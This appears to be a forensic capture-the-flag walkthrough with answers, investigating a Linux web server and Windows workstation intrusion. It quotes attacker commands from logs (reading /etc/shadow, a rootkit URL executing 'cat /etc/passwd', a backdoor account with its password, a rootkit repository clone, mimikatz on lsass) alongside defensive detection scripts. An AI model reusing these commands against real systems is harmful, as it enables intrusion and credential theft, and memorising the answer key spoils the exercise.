full_log:Jul 13 21:13:56 WEB-APP01 sudo[11504]: sysadmin : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/su

This shows:

  • User: sysadmin
  • Working Directory: /tmp (after creating files there)
  • Command: /usr/bin/su
  • Result: Escalated to root

sudo -l (at 21:13:46):

  • Purpose: Lists what sudo privileges the user has
  • Action: Just displays information, doesn't escalate privileges
  • Output: Shows what commands the user CAN run with sudo
  • This is a reconnaissance/enumeration command

sudo su (at 21:13:56):

  • Purpose: Actually escalates privileges and spawns a root shell
  • Action: Gives the attacker an interactive root shell
  • Result: The attacker now has full root access
  • This is the actual privilege escalation command

Answer:

sudo su

Q21

Which of the following indicators in command-line logs on WKS-RSCH01 would best suggest a named pipe impersonation technique was used for privilege escalation?

PowerShell commands referencing Invoke-WebRequest
Use of netsh with advfirewall
Registry writes to RunOnce
A write operation to a path like \\.\pipe\*

Analysis:

Named Pipe Impersonation:

Named pipe impersonation is a privilege escalation technique where an attacker:

  1. Creates a named pipe (which has a path like \\.\pipe\pipename)
  2. Waits for a privileged process to connect to it
  3. Impersonates the security context of that privileged process
  4. Gains elevated privileges

Evaluating the Options:

  1. PowerShell commands referencing Invoke-WebRequest
    • This indicates web requests/downloads
    • Not related to named pipes
  2. Use of netsh with advfirewall
    • This is firewall configuration
    • Not related to named pipes
  3. Registry writes to RunOnce
    • This is a persistence mechanism
    • Not related to named pipes
  4. A write operation to a path like \\.\pipe\*
    • \\.\pipe\ is the Windows named pipe path prefix
    • Write operations to this path indicate named pipe creation
    • This is the direct indicator of named pipe activity

Answer:

A write operation to a path like \\.\pipe\*

Q22

What does the execution of "sudo su" by the attacker suggest about the privilege level of the user "sysadmin" on WEB-APP01?

They are running as a limited user and probing firewall rules

They already have sudo privileges and are elevating to root

They are trying to escape a containerized environment

They are attempting lateral movement

Analysis:

From the logs we reviewed earlier:

Jul 13 21:13:56 WEB-APP01 sudo[11504]: sysadmin : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/su
rule.description:Successful sudo to ROOT executed

What does sudo su tell us?

  1. The command succeeded - The logs show "Successful sudo to ROOT executed"
  2. sudo - Requires the user to have sudo privileges configured
  3. su - Switches user to root when run with sudo
  4. Result - The sysadmin user gained a root shell

Evaluating the Options:

  1. They are running as a limited user and probing firewall rules
    • No firewall activity shown
    • If they were limited, sudo would fail
  2. They already have sudo privileges and are elevating to root
    • The command succeeded, proving sysadmin has sudo rights
    • They elevated from sysadmin user to root user
    • This is exactly what happened
  3. They are trying to escape a containerized environment
    • No container escape indicators
    • This is standard privilege escalation
  4. They are attempting lateral movement
    • Lateral movement is moving to other systems
    • This is vertical escalation on the same system

Answer:

They already have sudo privileges and are elevating to root

Q23

According to Apache access logs on Wazuh, at what date and time was the apache rootkit first used to execute a remote command on WEB-APP01? Answer Format: Provide the date and time in the following format: MM-DD-YYYY-HH:MM:SS. Time should be specified in the 24H format

Query to find first rkhandler usage:

agent.name:"WEB-APP01" AND rkhandler

From the results we saw earlier, the commands executed via the Apache rootkit were:

  1. Jul 13, 2025 @ 23:38:50 - /rkhandler?c=whoami (FIRST)
  2. Jul 13, 2025 @ 23:38:51 - /rkhandler?c=whoami (repeated)
  3. Jul 13, 2025 @ 23:39:07 - /rkhandler?c=id
  4. Jul 13, 2025 @ 23:39:32 - /rkhandler?c=cat%20/etc/passwd

From the earliest log entry:

timestamp:Jul 13, 2025 @ 23:38:50.416
full_log:18.212.186.186 - - [13/Jul/2025:23:38:50 +0000] "GET /rkhandler?c=whoami HTTP/1.1" 200 9

The first time the Apache rootkit was used to execute a remote command was:

  • Date: July 13, 2025
  • Time: 23:38:50 (11:38:50 PM)

1. Installation of Apache Rootkit:

Jul 13, 2025 @ 21:25:56 - git clone https://github.com/0xfffffffa/apache-rootkit.git
Jul 13, 2025 @ 21:26:02 - cd apache-rootkit/
Jul 13, 2025 @ 22:18:45 - sudo a2enmod rewrite (enabling Apache module)

2. First Use of Rootkit to Execute Commands:

Jul 13, 2025 @ 23:38:50 - /rkhandler?c=whoami (FIRST REMOTE COMMAND)

Answer:

07-13-2025-23:38:50

Q24

What command did the attacker use to create the new user account on WEB-APP01? Answer Format: Provide the full command as it appears in the logs.

agent.name:"WEB-APP01" AND useradd
agent.name:"WEB-APP01" AND location:"/var/log/commandlog.log" AND webadmin

  • Jul 13, 2025 @ 21:17:16 - sudo adduser webadmin (creates the user)
  • Jul 13, 2025 @ 21:17:32 - sudo usermod -aG sudo webadmin (adds to sudo group)
  • Jul 13, 2025 @ 21:17:40 - groups webadmin (checks groups)
  • Jul 13, 2025 @ 21:18:10 - passwd webadmin (sets password)

data.Command: 164 sudo adduser webadmin
full_log:2025-07-13T21:17:16.101657+00:00 WEB-APP01 LinuxCommandsWazuh: User root [11507]: 164 sudo adduser webadmin

Answer:

sudo adduser webadmin

Q25

After elevating privileges, the attacker created a new user account on WEB-APP01 for persistence. What is the exact username of the account created by the attacker? Answer Format: Provide the username exactly as it appears in the logs.

Evidence from the logs:

Jul 13, 2025 @ 21:17:16
data.Command: 164 sudo adduser webadmin
full_log:2025-07-13T21:17:16.101657+00:00 WEB-APP01 LinuxCommandsWazuh: User root [11507]: 164 sudo adduser webadmin

And confirmed in the useradd log:

Jul 13, 2025 @ 21:16:11
data.dstuser:webadmin
full_log:Jul 13 21:16:11 WEB-APP01 useradd[11603]: new user: name=webadmin, UID=1002, GID=1002, home=/home/webadmin, shell=/bin/bash

Answer:

webadmin

Q26

Based on the logs from WEB-APP01, what password did the attacker assign to the user account created for persistence? Answer Format: Provide the password exactly as it appears in the logs.

From the logs we saw, the attacker ran:

passwd webadmin

However, the passwd command is an interactive command that prompts for password input. The actual password is:

  1. NOT logged in system logs (for security reasons)
  2. NOT visible in command history
  3. Only stored as a hash in /etc/shadow

What we need to search for:

The attacker might have:

  1. Used a non-interactive method like echo "password" | passwd webadmin
  2. Used chpasswd command
  3. Set the password in a script

agent.name:"WEB-APP01" AND echo

echo "webadmin:a3therAdm1n" | sudo chpasswd

Answer:

a3therAdm1n

Q27

What is the name of the Apache module source file the attacker modified and compiled on WEB-APP01? Answer Format: Provide the filename exactly as it appears in the logs. For example: module.c

agent.name:"WEB-APP01" AND .c

Evidence from the logs:

Jul 13, 2025 @ 21:31:38
data.User:root 
data.Command: 176 apxs -c -i mod_authg.c
full_log:Jul 13 21:31:38 WEB-APP01 LinuxCommandsWazuh[16480]: User root [11507]: 176 apxs -c -i mod_authg.c

Answer:

mod_authg.c

Q28

What is the full URL of the GitHub repository the attacker cloned on WEB-APP01? Answer Format: Provide the full URL exactly as it appears in the logs. For example: https://guthub.com/repo.git

Evidence from the logs:

Jul 13, 2025 @ 21:25:56
data.User:root 
data.Command: 171 git clone https://github.com/0xfffffffa/apache-rootkit.git
full_log:Jul 13 21:25:56 WEB-APP01 LinuxCommandsWazuh[16148]: User root [11507]: 171 git clone https://github.com/0xfffffffa/apache-rootkit.git

Answer:

https://github.com/0xfffffffa/apache-rootkit.git

Q29

On the Windows workstation WKS-RSCH01, what is the name of the executable file specified in the ImagePath of the persistent service created by the attacker? Answer Format: Provide the executable filename exactly as it appears in the logs (e.g., example.exe).

agent.name:"WKS-RSCH01" AND data.win.system.eventID:"7045"

  • Jul 14, 2025 @ 00:14:09 - Service for named pipe (privilege escalation)
  • Jul 14, 2025 @ 01:06:04 - Persistent service ← This is the answer for Q29

From the second (and more recent) service creation:

Service Name: wbJlQcNDIgji
Service File Name: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem
data.win.eventdata.imagePath:"C:\\Users\\mhardy\\AppData\\Local\\Temp\\p3rsist.exe" rbgQAq

Answer:

p3rsist.exe

Q30

Why would the attacker execute "whoami" as the first command through the apache rootkit on WEB-APP01?

To crash the Apache process

To clear browser cache remotely

To test if Apache is logging properly

To confirm the rootkit is functional

Analysis:

From the logs we saw earlier:

Jul 13, 2025 @ 23:38:50 - /rkhandler?c=whoami (FIRST command)
Jul 13, 2025 @ 23:38:51 - /rkhandler?c=whoami (repeated)
Jul 13, 2025 @ 23:39:07 - /rkhandler?c=id
Jul 13, 2025 @ 23:39:32 - /rkhandler?c=cat /etc/passwd

Why whoami first?

The whoami command is a simple, harmless command that:

  1. Returns the current user context (shows which user the web server is running as)
  2. Confirms the backdoor works - If it returns output, the rootkit is functional
  3. Tests command execution - Verifies remote code execution is possible
  4. Leaves minimal trace - It's a benign command that doesn't modify anything

Evaluating the options:

  1. To crash the Apache process
    • No, whoami doesn't crash anything
  2. To clear browser cache remotely
    • No, whoami has nothing to do with browser cache
  3. To test if Apache is logging properly
    • No, attackers don't want logging; they want to avoid detection
  4. To confirm the rootkit is functional
    • Yes! This is exactly why - it's a safe test command

Answer:

To confirm the rootkit is functional

Q31

What is the name of the text file the attacker created in the "/tmp" directory on WEB-APP01 after accessing the "/etc/shadow" file? Answer Format: Provide the full name exactly as it appears in the logs, including the file extension (e.g., .txt, .log, .conf).

1. Search for sysadmin commands in /tmp:

agent.name:"WEB-APP01" AND data.User:sysadmin AND /tmp

2. Search for echo or touch by sysadmin:

agent.name:"WEB-APP01" AND data.User:sysadmin AND (echo OR touch)

3. Search for file operations before sudo su:

agent.name:"WEB-APP01" AND data.User:sysadmin AND data.Command:*

Command: echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt

Filename: shdw.txt

Timeline:

  1. Command 10 (21:12:49): sudo cat /etc/shadow - accessed password hashes
  2. Command 11 (21:13:15): cd /tmp - changed to /tmp directory
  3. Command 12 (21:13:34): echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt ← This is the answer
  4. Command 13 (21:13:38): cat shdw.txt - verified file contents
  5. Command 14 (21:13:46): sudo -l - checked sudo privileges

File created: shdw.txt
Location: /tmp/shdw.txt (the redirect target is relative, so it resolves against the /tmp working directory set by command 11)
Full command: echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt

Answer:

shdw.txt

Q32

What type of information did the attacker save in the text file in the "/tmp" directory on WEB-APP01?

base64-encoded command

Password hash entry

Group membership information

Command Execution History

Analysis:

The echoed line is a shadow(5) record for one account:

  • Username: sysadmin
  • Hash: $y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5
    • $y$ = yescrypt, the default password hash on current Debian/Ubuntu and Fedora releases
    • j9T = yescrypt cost parameters, followed by the salt (ZpWEDgCI7h7V2.WzGHQRN0) and the hash
  • 20276: days since 1970-01-01 on which the password was last changed (7 July 2025)
  • 0:99999:7: password aging parameters (minimum days between changes, maximum age, warning days before expiry); the empty trailing fields are the inactivity period and account-expiry date

Answer:

Password hash entry
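To make the field breakdown above mechanical, here is a small shadow(5) parser, added for this writeup and not part of the exam material. It takes the line the attacker echoed (constructed here from the log above), identifies the crypt(5) algorithm by its prefix, converts the last-change day count to a date, and flags the aging parameters an analyst would care about. It also handles locked ("!" or "*") and empty password fields, which the single line on the page does not exercise.

```python
from datetime import date, timedelta

# Constructed sample: the record the attacker echoed into /tmp/shdw.txt (from the log above).
SHADOW_LINE = ("sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5"
               ":20276:0:99999:7::")

EPOCH = date(1970, 1, 1)
FIELDS = ("name", "password", "lastchange", "min_days", "max_days",
          "warn_days", "inactive_days", "expire", "reserved")

# crypt(5) hash-id prefixes -> algorithm. Order matters only for readability; no prefix
# here is a prefix of another.
HASH_PREFIXES = {
    "$y$": "yescrypt", "$gy$": "gost-yescrypt", "$7$": "scrypt",
    "$6$": "sha512crypt", "$5$": "sha256crypt",
    "$2b$": "bcrypt", "$2y$": "bcrypt", "$2a$": "bcrypt",
    "$1$": "md5crypt",
}
# Algorithms whose last two '$'-separated pieces are salt and digest.
SALTED = {"yescrypt", "gost-yescrypt", "scrypt", "sha512crypt", "sha256crypt", "md5crypt"}


def classify_hash(pw):
    """Return (state, algorithm) for a shadow password field.
    state is 'empty', 'locked', 'hashed' or 'unknown'."""
    if pw == "":
        return "empty", None                      # passwordless login: a finding in itself
    locked = pw.startswith(("!", "*"))            # '!' / '*' prefix disables password login
    body = pw.lstrip("!*")
    algo = next((name for prefix, name in HASH_PREFIXES.items() if body.startswith(prefix)), None)
    if algo is None and len(body) == 13:
        algo = "descrypt"                         # legacy 13-character DES hash
    state = "locked" if locked else ("hashed" if algo else "unknown")
    return state, algo


def parse_shadow_line(line):
    parts = line.rstrip("\n").split(":")
    # A real shadow(5) line has 9 fields; the echoed line above carries 8, so pad.
    if len(parts) not in (8, 9):
        raise ValueError("expected 8 or 9 colon-separated fields, got %d" % len(parts))
    parts += [""] * (9 - len(parts))
    rec = dict(zip(FIELDS, parts))
    rec["state"], rec["algorithm"] = classify_hash(rec["password"])
    body = rec["password"].lstrip("!*")
    rec["salt"] = rec["digest"] = None
    if rec["algorithm"] in SALTED and body.startswith("$"):
        pieces = body.split("$")[1:]             # e.g. ['y', 'j9T', salt, digest]
        rec["salt"], rec["digest"] = pieces[-2], pieces[-1]
    last = rec["lastchange"]
    rec["lastchange_date"] = (EPOCH + timedelta(days=int(last))).isoformat() if last.isdigit() else None
    return rec


def assess(rec):
    """Analyst-facing findings about one shadow record."""
    findings = []
    if rec["state"] == "empty":
        findings.append("no password set")
    if rec["algorithm"] in ("md5crypt", "descrypt"):
        findings.append("legacy hash (%s) is fast to crack" % rec["algorithm"])
    if rec["max_days"] in ("", "99999"):
        findings.append("password never expires (max_days=%s)" % (rec["max_days"] or "unset"))
    if rec["state"] == "hashed" and rec["lastchange"] == "0":
        findings.append("password change forced at next login")
    return findings


if __name__ == "__main__":
    record = parse_shadow_line(SHADOW_LINE)
    for key in ("name", "algorithm", "salt", "lastchange_date", "min_days", "max_days", "warn_days"):
        print("%-16s %s" % (key, record[key]))
    print("findings:", assess(record))
```

The day count is interpreted against the Unix epoch in days, not seconds; 20276 lands on 2025-07-07, a week before the incident, which is consistent with the attacker having dumped a freshly set credential.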

Q33

What is the full filename of the executable the attacker used to perform OS Credential Dumping on WKS-RSCH01 after elevating privileges? Answer Format: Provide the name of the executable exactly as it appears in the logs, including the extension. For example: tool.exe

Sysmon Event ID 10 (Process Access) - July 14, 2025 @ 00:25:28

SourceImage: C:\Users\Public\mimikatz.exe
TargetImage: C:\Windows\system32\lsass.exe
SourceUser: NT AUTHORITY\SYSTEM
GrantedAccess: 0x1010
RuleName: technique_id=T1003,technique_name=Credential Dumping

Key Details:

  • Executable: mimikatz.exe
  • Location: C:\Users\Public\mimikatz.exe
  • Target Process: lsass.exe (Local Security Authority Subsystem Service)
  • Access Rights: 0x1010 = PROCESS_QUERY_LIMITED_INFORMATION (0x1000) | PROCESS_VM_READ (0x0010), the minimum a credential dumper needs to read LSASS memory
  • User Context: NT AUTHORITY\SYSTEM (elevated privileges)
  • Timestamp: 00:25:27 (after privilege escalation at 00:14:09)
  • MITRE ATT&CK: T1003.001 (LSASS Memory credential dumping)

Attack Flow:

  1. 00:14:09 - Named pipe privilege escalation to SYSTEM
  2. 00:25:27 - mimikatz.exe accessed lsass.exe to dump credentials
  3. 01:06:04 - Persistent service created (p3rsist.exe)

Answer:

mimikatz.exe
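The GrantedAccess decoding and the source/target check above can be turned into a detection over Sysmon Event ID 10 records. The following Python is an added example (not from the exam or any vendor rule set): the events are constructed to mirror the fields of the mimikatz event above plus invented benign and malicious comparisons, and the path allow-list is an assumption to tune per environment. Because it matches on path alone, a dumper copied into an allowed path would slip past it; pair it with signer or hash checks in production.

```python
# Sysmon Event ID 10 (ProcessAccess) triage: decode GrantedAccess and flag handles to
# lsass.exe that carry memory-read rights from images outside a small allow-list.
PROCESS_ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights that let a caller read or tamper with another process's memory. A dumper needs
# at least PROCESS_VM_READ; query-only handles (0x1000, 0x1400) are routine.
DUMP_RIGHTS = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040

# ASSUMPTION for this example: images legitimately allowed to open lsass.exe. Lower-cased
# full paths; tune to the estate.
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed sample events modelled on the Sysmon Event ID 10 fields. The first is the
# mimikatz event quoted above; the rest are invented benign and malicious comparisons.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-07-14 00:25:27.000", "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "SourceUser": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2025-07-14 00:26:02.000", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000",
     "SourceUser": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2025-07-14 00:27:40.000", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "SourceUser": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2025-07-14 00:31:15.000", "SourceImage": r"C:\Windows\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "SourceUser": r"NT AUTHORITY\SYSTEM"},
    {"UtcTime": "2025-07-14 00:32:00.000", "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1010",
     "SourceUser": r"NT AUTHORITY\SYSTEM"},
]


def decode_access(mask):
    """Expand a GrantedAccess mask into the PROCESS_* right names it contains."""
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]


def is_lsass_dump_attempt(event, allowlist=ALLOWLIST):
    """True when a non-allow-listed image opens lsass.exe with memory-read/write rights."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return False
    mask = int(event["GrantedAccess"], 16)        # Sysmon logs the mask as a hex string
    if not mask & DUMP_RIGHTS:
        return False
    return event["SourceImage"].lower() not in allowlist


def detect_lsass_access(events, allowlist=ALLOWLIST):
    alerts = []
    for ev in events:
        if is_lsass_dump_attempt(ev, allowlist):
            mask = int(ev["GrantedAccess"], 16)
            alerts.append({"UtcTime": ev["UtcTime"], "SourceImage": ev["SourceImage"],
                           "SourceUser": ev["SourceUser"], "GrantedAccess": ev["GrantedAccess"],
                           "Rights": decode_access(mask)})
    return alerts


if __name__ == "__main__":
    for a in detect_lsass_access(SAMPLE_EVENTS):
        print("%s  %s  %s  %s" % (a["UtcTime"], a["SourceImage"], a["GrantedAccess"], "|".join(a["Rights"])))
```

Run against real exports, the rule fires twice on the sample set: the mimikatz handle with 0x1010 and the procdump-style PROCESS_ALL_ACCESS handle; the svchost query-only handle, the allow-listed Defender engine and the mimikatz handle to explorer.exe are all ignored.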

Q34

Based on network traffic correlation, what was the exact date and time the Word document was downloaded on WKS-RSCH01? Answer Format: Use the format MM-DD-YYYY-HH:MM:SS (e.g., 07-18-2025-09:14:22).


C:\Users\Administrator\Desktop\Evidence\PCAPs>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence\PCAPs

07/17/2025  05:47 PM    <DIR>          .
07/17/2025  05:47 PM    <DIR>          ..
07/14/2025  02:02 AM         9,096,900 FILE-SRV01.pcapng
07/14/2025  01:31 AM        13,510,860 RSCH-WKS01-2.pcapng
07/14/2025  12:00 AM         5,735,356 RSCH-WKS01.pcapng
               3 File(s)     28,343,116 bytes
               2 Dir(s)  36,553,654,272 bytes free

Load RSCH-WKS01.pcapng (the earlier of the two workstation captures) in Wireshark:

C:\Users\Administrator\Desktop\Evidence\PCAPs\RSCH-WKS01.pcapng

and apply this display filter:

http and http.request.method==GET

The request for the document and its response (frame time displayed in UTC):

Jul 13, 2025 23:49:49.012957000 Coordinated Universal Time
GET /AetherGen_SARS-CoV-3_Response_Plan.docm HTTP/1.1
Host: 18.212.186.186
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://18.212.186.186/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.13.3
Date: Sun, 13 Jul 2025 23:49:48 GMT
Content-type: application/vnd.ms-word.document.macroEnabled.12
Content-Length: 108782
Last-Modified: Sun, 13 Jul 2025 23:41:45 GMT

The frame timestamp is the one to use (Wireshark is displaying UTC); the server's Date header reads 23:49:48 because it comes from the attacker host's clock, not from the capture.

Answer:

07-13-2025-23:49:49

Q35

What is the name of the compressed archive the attacker created for purposes of data exfiltration on WKS-RSCH01? Answer Format: Provide the name of the archive exactly as it appears in the logs, including the extension

Evidence from Sysmon Logs:

File Creation Event - July 14, 2025 @ 01:13:33.043 UTC

Event ID: 11 (File Created)
Image: C:\Users\Public\7z.exe
TargetFilename: C:\Users\Public\ad.7z
CreationUtcTime: 2025-07-14 01:13:33.043
User: NT AUTHORITY\SYSTEM
ProcessId: 4168

Temporary file also created at 01:14:19.456:

TargetFilename: C:\Users\Public\ad.7z.tmp

Key Details:

  • Archive Name: ad.7z (likely "Active Directory" data)
  • Compression Tool: 7-Zip (7z.exe)
  • Location: C:\Users\Public\ad.7z
  • User Context: NT AUTHORITY\SYSTEM (elevated privileges)
  • Purpose: Data exfiltration preparation
  • MITRE ATT&CK: T1560.001 (Archive Collected Data: Archive via Utility) and T1074.001 (Data Staged: Local Data Staging); T1105 (Ingress Tool Transfer) covers bringing 7z.exe onto the host, not creating the archive
  • Timeline: Created after persistent service installation (01:06:04) and before end of incident

Attack Flow:

  1. 01:06:04 - Persistent service created (p3rsist.exe)
  2. 01:13:33 - Archive created: ad.7z (data collection/staging)
  3. 01:14:19 - Temporary file ad.7z.tmp created (7z compression in progress)
  4. Prepared for exfiltration via FTP server on WEB-APP01

Answer:

ad.7z

Q36

On WKS-RSCH01, the attacker enumerated Organizational Units (OUs) and groups to identify AD group memberships. They then saved the results into separate text files, with one file created per group. Based on the KAPE evidence, how many text files did the attacker create for the enumerated groups?

4

2

3

1

cd "C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE\RSCH-WKS01\KAPE"


C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE\RSCH-WKS01\KAPE>findstr /i "Public" 2025-07-17T21_29_58_7761996_ConsoleLog.txt
[2025-07-17 21:29:59.1517939 | INF] Command line:   --tsource C: --tdest C:\Users\mhardy\Desktop\WKS-RSCH01\KAPE --target AppDataRecursive,UsersPublic,!BasicCollection,!SANS_Triage,OfficeDocumentCache,ScheduledTasks,StartupFolders,StartupInfo --zip WKS-RSCH01 --gui

C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE\RSCH-WKS01\KAPE>findstr /i "group" 2025-07-17T21_29_58_7761996_ConsoleLog.txt
[2025-07-17 21:30:24.3075028 | INF]   Deferring C:\Windows\System32\winevt\logs\Microsoft-Windows-GroupPolicy%4Operational.evtx due to IOException...
[2025-07-17 21:30:24.3235035 | INF]   Deferring C:\Windows\System32\winevt\logs\Microsoft-Windows-HomeGroup Control Panel%4Operational.evtx due to IOException...
[2025-07-17 21:30:39.1825630 | INF]   Copied deferred file C:\Windows\System32\winevt\logs\Microsoft-Windows-GroupPolicy%4Operational.evtx to C:\Users\mhardy\Desktop\WKS-RSCH01\KAPE\C\Windows\System32\winevt\logs\Microsoft-Windows-GroupPolicy%4Operational.evtx. Hashing source file...
[2025-07-17 21:30:39.1981770 | INF]   Copied deferred file C:\Windows\System32\winevt\logs\Microsoft-Windows-HomeGroup Control Panel%4Operational.evtx to C:\Users\mhardy\Desktop\WKS-RSCH01\KAPE\C\Windows\System32\winevt\logs\Microsoft-Windows-HomeGroup Control Panel%4Operational.evtx. Hashing source file...

Search for file creation in Public folder:

agent.name:"WKS-RSCH01" AND data.win.system.eventID:"11" AND data.win.eventdata.targetFilename:*Public*
  • ad.7z (archive)
  • 7z.exe (compression tool)
  • PowerView.ps1 (AD enumeration tool)
  • mimikatz.exe (credential dumper)
  • AdFind.exe (AD enumeration tool)
  • dochelp.exe (initial payload)

These events cover the tooling staged in C:\Users\Public, not the per-group output files themselves; those are counted in KAPE's copy of the folder (the UsersPublic target in the command line above), which is the evidence the question points at.

Answer:

3

Q37

What is the full filename of the document downloaded onto WKS-RSCH01? Answer Format: Provide the filename including extension as it appears in the logs. For example: document.docx

Export the HTTP objects from RSCH-WKS01.pcapng (Wireshark: File > Export Objects > HTTP, Save All) into a working folder, here PCAPs\e, and list it:

PS C:\Users\Administrator\Desktop\Evidence\PCAPs\e> dir


    Directory: C:\Users\Administrator\Desktop\Evidence\PCAPs\e


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-        12/4/2025   7:46 AM            337 %5c
-a-        12/4/2025   7:46 AM         108782 AetherGen_SARS-CoV-3_Response_Plan.docm
-a-        12/4/2025   7:46 AM           7168 dochelp.exe
-a-        12/4/2025   7:46 AM            335 favicon.ico
-a-        12/4/2025   7:46 AM            339 security-credentials
-a-        12/4/2025   7:46 AM            387 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh
-a-        12/4/2025   7:46 AM            397 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(1)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(10)
-a-        12/4/2025   7:46 AM            288 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(100)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(101)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(102)
-a-        12/4/2025   7:46 AM            544 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(103)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(104)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(105)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(106)
-a-        12/4/2025   7:46 AM            480 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(107)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(108)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(109)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(11)
-a-        12/4/2025   7:46 AM            624 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(110)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(111)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(112)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(113)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(114)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(115)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(116)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(117)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(118)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(119)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(12)
